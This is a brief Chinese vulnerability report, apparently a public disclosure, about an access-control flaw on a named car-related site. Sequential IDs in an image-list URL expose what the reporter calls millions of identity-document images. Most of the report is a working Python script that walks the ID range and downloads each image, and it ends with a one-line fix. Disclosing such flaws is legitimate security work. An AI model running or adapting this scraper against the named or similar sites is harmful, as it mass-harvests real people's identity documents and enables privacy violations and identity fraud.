mark
越权链接:
http://zhihuan.xd2sc.com/CarExapp/imagelist.aspx?id=1400012
ID处可遍历
测试了ID从1400000开始一直到5431133都还有数据,几百万的证件信息。
写了个批量脚本,随机找了100个id检测下
#!/usr/bin/env python
#-*- coding:utf-8 -*-
import urllib
import re
def getImg(id):
url = "http://zhihuan.xd2sc.com/CarExapp/imagelist.aspx?id=%s" %id
resp = urllib.urlopen(url)
imgurl = re.search(r'src = "(.*?)"', resp.read())
if imgurl.group(1) == "":
pass
else:
imgurl = "http://zhihuan.xd2sc.com/CarExapp/"+imgurl.group(1)
img = urllib.urlopen(imgurl).read()
with open(str(id)+".jpg",'wb') as fs:
fs.write(img)
if __name__ == '__main__':
for i in range(5000000,5000100):
getImg(i)
解决方案:
控制权限